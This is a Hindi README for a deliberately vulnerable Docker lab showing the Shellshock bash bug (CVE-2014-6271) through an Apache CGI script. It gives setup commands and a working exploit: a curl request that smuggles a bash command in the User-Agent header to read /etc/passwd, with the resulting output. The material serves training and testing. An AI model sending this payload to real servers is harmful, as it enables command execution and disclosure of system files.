
सेवा के रूप में भेद्यता: CVS-2014-6271 प्रदर्शित करना, उर्फ Shellshock
बैश के एक कमजोर संस्करण और CVS-2014-6271 (जिसे शेलशॉक के नाम से जाना जाता है) को प्रदर्शित करने के लिए एक वेब एप्लिकेशन वाला डेबियन (बस्टर) लिनक्स सिस्टम।
यह डॉकर कंटेनर डेबियन बस्टर पर आधारित है और इसे बैश के एक कमजोर संस्करण (bash_4.2:2b:dfsg-0.1) का उपयोग करने के लिए संशोधित किया गया है।
एक वेब एप्लिकेशन अपाचे 2 के माध्यम से उपलब्ध है और एक CGI स्क्रिप्ट प्रदान करता है जो शेल कमांड चलाती है।
कंटेनर को स्थापित करें: docker pull hmlio/vaas-cve-2014-6271
पोर्ट मैपिंग के साथ कंटेनर चलाएँ: docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271
आपको वेब एप्लिकेशन http://your-ip:8080/ पर एक्सेस करने में सक्षम होना चाहिए।
वेब एप्लिकेशन/कमजोर बैश संस्करण का निम्नानुसार शोषण किया जा सकता है:
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
अवधारणा और वेब एप्लिकेशन बड़े पैमाने पर rasta_mouse द्वारा बनाई गई VulnHub VM "Sokar" से प्रेरित हैं। अधिक जानकारी के लिए कृपया https://www.vulnhub.com/entry/sokar-1,113/ देखें।